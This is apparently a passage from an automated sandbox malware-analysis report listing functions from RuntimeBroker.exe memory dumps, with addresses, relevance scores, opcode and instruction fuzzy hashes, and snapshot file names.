Opcode Fuzzy Hash: 46e003c34abb87eadfab379bd83f30e508a70f12fc173aeff1aef0d95a9ac882
Instruction Fuzzy Hash: 19018F70E1A75E8FEB61EBA484599A977E0EF19300F4246B6D408C71B6EE34E540C710

Function 00007FFD9B7EC579 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64b6d19761d78f4fc5cfb3e29f87105e2e39aef66524e0d715db21d7ecdaf8d
Instruction ID: 258f1654341e87b9433d966c248f818268ec7e4cc0a8613fea42df420d0c78d3
Opcode Fuzzy Hash: d64b6d19761d78f4fc5cfb3e29f87105e2e39aef66524e0d715db21d7ecdaf8d
Instruction Fuzzy Hash: BA11AC34A0A78E8FDB69DF6484691B93FA1FF59304F6202BBD419C60B6CA35A640C780

Function 00007FFD9B7E05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction ID: 25aa7b04738fa33a719f09687289ac213e09c4bd3eaceced5f0943b2df980e6b
Opcode Fuzzy Hash: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction Fuzzy Hash: 92018030A0560E8EDB59EF64C4666B977A1EF58304F51057AD41EC65F4CA31A650C740

Function 00007FFD9B7F24F1 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f2000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ac40b8221c2fb827c1194969584e4a93827733f5a9e52d811a339353589808
Instruction ID: 4a9ed410a567b823b0a40dd7a18d15827e4f32d1c49a31e192b0bd59ea4d739c
Opcode Fuzzy Hash: 04ac40b8221c2fb827c1194969584e4a93827733f5a9e52d811a339353589808
Instruction Fuzzy Hash: EE01B130E0924E8FDB59AFB4C4755B97BA0EF19304F4205BAE40EC70E2DA35A540C740

Function 00007FFD9B7EAA79 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2c2cfd894d8db4d0cff3487d6abe68da3ca71c7731d133e1b15b08e52959eb
Instruction ID: 7f5b5d75eea9d33b2d6dd53d1ec937ff16b1d2067944d73ee0d2177f3cf142bf
Opcode Fuzzy Hash: ad2c2cfd894d8db4d0cff3487d6abe68da3ca71c7731d133e1b15b08e52959eb
Instruction Fuzzy Hash: 84018C30A1E78E8FDB55EF64C4695B97BA0EF09304F4605BED40ACA1F2DA39A940C701

Function 00007FFD9B7EBD4C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e710a37f65036f1244c53fefb131ba24d155b9f8dd724aa311babaffccda694
Instruction ID: 6667619ffddb07774f6e6f0ce204ddf95eb65c09beac60f4e4ad4f384bf3529b
Opcode Fuzzy Hash: 5e710a37f65036f1244c53fefb131ba24d155b9f8dd724aa311babaffccda694
Instruction Fuzzy Hash: 01014030A19A4E8EEB94EF68C4A82BD7BE0FF18305F51057AD41AC61B1DA75A650C740

Function 00007FFD9B7F7D79 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af99270bdf5ad118cb5128a746294044f2939001fa13597ec8f3724b802db90a
Instruction ID: 85081a170a3bb7088a62bcc1a56aaebc026172dd44d1bd2d5520b14e09c5c20d
Opcode Fuzzy Hash: af99270bdf5ad118cb5128a746294044f2939001fa13597ec8f3724b802db90a
Instruction Fuzzy Hash: 1E01D230A4A38E9FDB55AB74C8685B93BA0EF19304F4204FAD019C60F2DA34A540C751

Function 00007FFD9B7E283D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction ID: 25a6e0480d79e78e869b771d7ae76cb00f610704efb9557c5802c561e5ae1437
Opcode Fuzzy Hash: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction Fuzzy Hash: A5018F30E5A64E8FE755EBA488585B977F0EF19300F4245B6D418C70B6EE38E694C710

Function 00007FFD9B7E1C65 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction ID: 31f1bdfa9c0a2ddb257b8ea257b368e4945cb54eea1f8d557c9831de81bef7b7
Opcode Fuzzy Hash: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction Fuzzy Hash: 2A018130A0A64E8FDB559F5484666BA37A0FF55304F51057AE80DC65F1CB35A950C740

Function 00007FFD9B7E2ED9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19963eb88c5988669d26978bc6283f43d4fd84e0160fb19bd1c54204ec43f523
Instruction ID: 7172908c14490c117b60bd1c8745267597db8be1e377b280bc382c6a0132abef
Opcode Fuzzy Hash: 19963eb88c5988669d26978bc6283f43d4fd84e0160fb19bd1c54204ec43f523
Instruction Fuzzy Hash: 32018471A1E74E8FD752E7B488695A97BE0EF09304F4605B3D408CB0B6DA38A6448711

Function 00007FFD9B7E343C Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction ID: eaba69e175634c88b8d1d55229e42f2473be5355c776f71dc63330ad0d90f8ec
Opcode Fuzzy Hash: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction Fuzzy Hash: 89014F71E09A0E8EEB52FF6884585B97BE0FF19301F0209B6D419D7075EA34A6448750

Function 00007FFD9B7EABD9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e326b90ad9c300691f849dc44160103540ed18f469ad75739944fffd0dee31
Instruction ID: 6a7a72f5846a540a11e2543a85c66d4b801119425fb12cbbe6eb4cd01c8fa148
Opcode Fuzzy Hash: 58e326b90ad9c300691f849dc44160103540ed18f469ad75739944fffd0dee31
Instruction Fuzzy Hash: 95014431E5E74E4FE762AB7488695A97BE0EF15300F464AF7D409C70F6EA28A5448701

Function 00007FFD9B7E0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction ID: 35591fc9d73d6cd682e85b2953707cd4c13841da19703e382e5a965825042109
Opcode Fuzzy Hash: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction Fuzzy Hash: 9701D130A1560E8AEB68EFB4C4686BD37A0FF18305F51097ED41ED21F4DE35B280CA00

Function 00007FFD9B7E0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction ID: 07ddd71c09420b1d25e8c764e9bf39776b4d5a33b5a588256e8d4c5308ab11c5
Opcode Fuzzy Hash: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction Fuzzy Hash: 0A016D30A1960E9AEB68EBA4C4696B973E0FF18309F51097ED41ED21F5DE35A650C600

Function 00007FFD9B7E05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction ID: fc8f02f6c411fe655d40531ebf536a0247cca477e6282e85d34de133c0b854ba
Opcode Fuzzy Hash: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction Fuzzy Hash: 9EF0C230E0A64E8FEB65EF6494666FA37A0EF45308F51057AE80EC25F1CE35A6A0C740

Function 00007FFD9B7EBA3B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2da3e9ad4928093581c1d8345fd2e9ce9682ad5d3426c34f12e48662a42c9a6
Instruction ID: 14750dfc8a7d361a902d6a4c55e79f7b8e57359933da1a5598c33ec7a9d270e1
Opcode Fuzzy Hash: b2da3e9ad4928093581c1d8345fd2e9ce9682ad5d3426c34f12e48662a42c9a6
Instruction Fuzzy Hash: AE010070E0961E8EDF61DBA4C494AFDBBB0AF18301F114676D009D62B5DA38A684CB94

Function 00007FFD9B7E2759 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction ID: def44d4317b2ebeb4cd9e3fc4ee67102d1f6c485a3f73b0b5a515a2be03ca793
Opcode Fuzzy Hash: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction Fuzzy Hash: 9CF09631A0E38D8FDB6A9F7488652A93F70FF06304F4605BAD419C61F2DB38A554CB41

Function 00007FFD9B7E27CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction ID: ec771d4a23cb0f74c6488ea950f464b6fcf91c7ea2a6678629186a58ff849c46
Opcode Fuzzy Hash: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction Fuzzy Hash: 27F09031A0E78E8FEB699FA488291B97BE0FF55308F4205BAD409C60F6DB399554C741

Function 00007FFD9B7EEE08 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd2d64e33fe575d3af9881bd38121e0db396342fbf33c886a96229cdf0d5a82
Instruction ID: cb7983c0423af42474219311983c269cd21beb89b409f6b30d060d797368931c
Opcode Fuzzy Hash: fcd2d64e33fe575d3af9881bd38121e0db396342fbf33c886a96229cdf0d5a82
Instruction Fuzzy Hash: BE01C074E4562D8BEBA4DB54C8A47ADB6B1AF58301F1106FAD04EA72B5CB341E808F54

Function 00007FFD9B7E0F49 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdaee13d0c6b9dd2f61cecb2a139cb52efa00b58964bdceaef7099ea84f4bb45
Instruction ID: dd9e5fef860e84f99890dce3bd31c18f64599d837acb81a7e32049428e96800e
Opcode Fuzzy Hash: bdaee13d0c6b9dd2f61cecb2a139cb52efa00b58964bdceaef7099ea84f4bb45
Instruction Fuzzy Hash: 44F01230E0950ECAEB24DB44D861BEE77B1EF94301F1142B5C009972B5DE746A818B80

Analysis Process: RuntimeBroker.exePID: 7872, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B7E35A5 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2369ca3fdf7925c84e246a74ca1a18c7c2ff2bca1207245c1def9d4de39a6ba
Instruction ID: 194bde1ab78789ef174e5c6c5336254bfc8721cf20f75f1751abb157e6171a2f
Opcode Fuzzy Hash: f2369ca3fdf7925c84e246a74ca1a18c7c2ff2bca1207245c1def9d4de39a6ba
Instruction Fuzzy Hash: 7AA1A471A19A4D8FEB95DB68C8657EDBBF1FF95310F4102BAD009D32EADB7824018750

Function 00007FFD9B7EC86D Relevance: 2.7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B7EC939
K|M, xrefs: 00007FFD9B7EC86F

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _$K|M
API String ID: 0-3210996399
Opcode ID: ca8f2f1907477cfea654d47efa7a7c3c762ab65da891a49cfa7f21c03a866785
Instruction ID: 8b11fca5c2a0e02799a65ee5a90816c14f70a4a05bbc3c46de9d183a46d0c800
Opcode Fuzzy Hash: ca8f2f1907477cfea654d47efa7a7c3c762ab65da891a49cfa7f21c03a866785
Instruction Fuzzy Hash: 90513B2FB0C26A49D714BB7CB8694ED3B60DF8133AB1A42F7D18DCA0E7DD18204686D4

Function 00007FFD9B7EC8FB Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B7EC939

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 2b8a99283f5b6bd1b55d928851e6cd7820a6e5aecc701b62358dc3a00aeefe88
Instruction ID: 54cf0f80db18cb622100c9ba5df77d38a05a07a3fd858a61b56344edb3236ca8
Opcode Fuzzy Hash: 2b8a99283f5b6bd1b55d928851e6cd7820a6e5aecc701b62358dc3a00aeefe88
Instruction Fuzzy Hash: 5741232BB0D66E89E714BB7CB8550ED37A0EF8033AF1502B7D509CA0E7EE24244687D0

Function 00007FFD9B7F00FB Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

G, xrefs: 00007FFD9B7F0119

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7f0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction ID: c1fe0f453f44426140a4e2d2706b44009237af0d8d64d29f2200d6566ea1abf3
Opcode Fuzzy Hash: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction Fuzzy Hash: F4D092B090861D8FEBA4EF08C8947AC76B1BF58304F0001AAD20ED22B0CB345BA08F09

Function 00007FFD9B7EDA29 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19994a66bace54fc63a673a38c1759989bbc3d8dc85993633e21a3a4f67b75b
Instruction ID: 2d75306f041116fe3f722b877b02dc83dbf727af888e7677ee70665faa210fba
Opcode Fuzzy Hash: b19994a66bace54fc63a673a38c1759989bbc3d8dc85993633e21a3a4f67b75b
Instruction Fuzzy Hash: 61E13E71E19A5D8FDB68DB58C8647A8B7B1FF58300F4541BAD01DD72E6DA346940CB40

Function 00007FFD9B7E1CED Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb7c803a62f940e32d08db9f595c8c56caba723f7165efb1039878f4bc2b469
Instruction ID: 2ad453c9528685ac54c8a835a0f5544290eff681617a007d1da4b8550eed793a
Opcode Fuzzy Hash: 5eb7c803a62f940e32d08db9f595c8c56caba723f7165efb1039878f4bc2b469
Instruction Fuzzy Hash: 7651DE31B09B4A4FDB58CE5888655BA73E2FFD8301B15467EE45EC72A2CE34ED028781

Function 00007FFD9B7E31F5 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585e76edcd8b11b1162356e820674eed674f9b98e4c21ebe8261c2f5b2f27ab9
Instruction ID: c04ca42aef059972da2bd0d459dbd472eec658bc5dd5bc4875b056421f5ec86d
Opcode Fuzzy Hash: 585e76edcd8b11b1162356e820674eed674f9b98e4c21ebe8261c2f5b2f27ab9
Instruction Fuzzy Hash: C5510D70E0961D8FEB65DB94C464AEDB7F1EF44310F52027AD009E72B5DE386A44CB50

Function 00007FFD9B7EBDB9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe57a1a205123d309dcc7462f5674b789b70a31fc75099618420e7ca5575d486
Instruction ID: 64d7b23a01dd9593fdc7426991331238fa924b3aac60bccbf39386b092c29d81
Opcode Fuzzy Hash: fe57a1a205123d309dcc7462f5674b789b70a31fc75099618420e7ca5575d486
Instruction Fuzzy Hash: 9141F970E0A64E8FEB64DFA8C4A46ED7BF1AF08300F11417AD119E72B1DB38A9448B50

Function 00007FFD9B7E2429 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a12d54963d6b4722a87cd6b0930fecebc7432cd87926478ad5ea6a5943a0fa0
Instruction ID: f8363d3b43b1b95673391da8ac01f125ee7c35f8825a60df3b68aae2a6e17841
Opcode Fuzzy Hash: 5a12d54963d6b4722a87cd6b0930fecebc7432cd87926478ad5ea6a5943a0fa0
Instruction Fuzzy Hash: CF312F31E1A61D8AEB64DB94C8617FCB371AF12310F11137AD01EA61F2DE746A84CF40

Function 00007FFD9B7EC35E Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1c88daefa7a6079e3d25d2253915db046633951b545873fd77cc3ee42d9afa
Instruction ID: 5e6f4e1005cb6934183008c752fba73593db67f138580fd9de9bee821979dc25
Opcode Fuzzy Hash: 0c1c88daefa7a6079e3d25d2253915db046633951b545873fd77cc3ee42d9afa
Instruction Fuzzy Hash: 2E21E975E09A0D8EDFA4EBA8D4A56FCBBB1FF59300F515239D00DE72B2CE2469418B40

Function 00007FFD9B7EC9FB Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c06927d52a0a0e9691fc73126532d1546cc05e048d85a8e811e7e1fabdc259b
Instruction ID: 3a6d50a6b6d766a00fe35797ddb6c45dae7bab8aa294f4fe10504018f9f72a5a
Opcode Fuzzy Hash: 7c06927d52a0a0e9691fc73126532d1546cc05e048d85a8e811e7e1fabdc259b
Instruction Fuzzy Hash: B821502AF0E79A4AE766FBF8A4294FD3760AF51329F0643B7D41DC50F6DE2825408251

Function 00007FFD9B7EB058 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f2fb52d80b6c54f92f92e10830698fb6d2f2cbed32694c652e29efdd9ce9a6
Instruction ID: 18d5ff9502b8ba829b87f82fcf31e3d42d3c683d7975cbffda60c779d0b8c07d
Opcode Fuzzy Hash: d1f2fb52d80b6c54f92f92e10830698fb6d2f2cbed32694c652e29efdd9ce9a6
Instruction Fuzzy Hash: 35217430E1560F8EEB61EBA8C4985BDB7E1FF48310F464AB6D41DC71B5EE34B6448640

Function 00007FFD9B7E2189 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d822dd1c0d1dd5381500979bfff1f9a50a1ec31724bf19efe34138369efe215
Instruction ID: 8ce7df933fddef4eacaf2943118baa0b1e75a7f6e0563024dfcd6b8ad85c66e0
Opcode Fuzzy Hash: 9d822dd1c0d1dd5381500979bfff1f9a50a1ec31724bf19efe34138369efe215
Instruction Fuzzy Hash: 1711B130F1960E8FE755EBB488699B977E0EF06304F0145F6E41DC70B6EE38AA858751

Function 00007FFD9B7E084D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55203d088d446031a6782c0a352b9e06a01e56690402e0570944de86aed70b3
Instruction ID: 37e7ff722c69514a6b34585865b6074eef317ad45f0fac11d474109ef4073a0d
Opcode Fuzzy Hash: a55203d088d446031a6782c0a352b9e06a01e56690402e0570944de86aed70b3
Instruction Fuzzy Hash: E7115731F0A64E9FE761ABB8C86A4E837E0FF01700F064676C089D60B6ED30A544C290

Function 00007FFD9B7E0A01 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4e3247f0e417838913c1d6d0ed1815109d3e07c430653b5d1a2c4ff1ef0d1b
Instruction ID: 1f027fa417631c534f8164331fc1dc3932bbcc92a516f815b0aa001dd45d34e2
Opcode Fuzzy Hash: 8f4e3247f0e417838913c1d6d0ed1815109d3e07c430653b5d1a2c4ff1ef0d1b
Instruction Fuzzy Hash: C9118F30E1960E8FEB90EFA8885A5BD77E1FF58700F4146B6D418C61B6EE34A5448750

Function 00007FFD9B7EC9D3 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

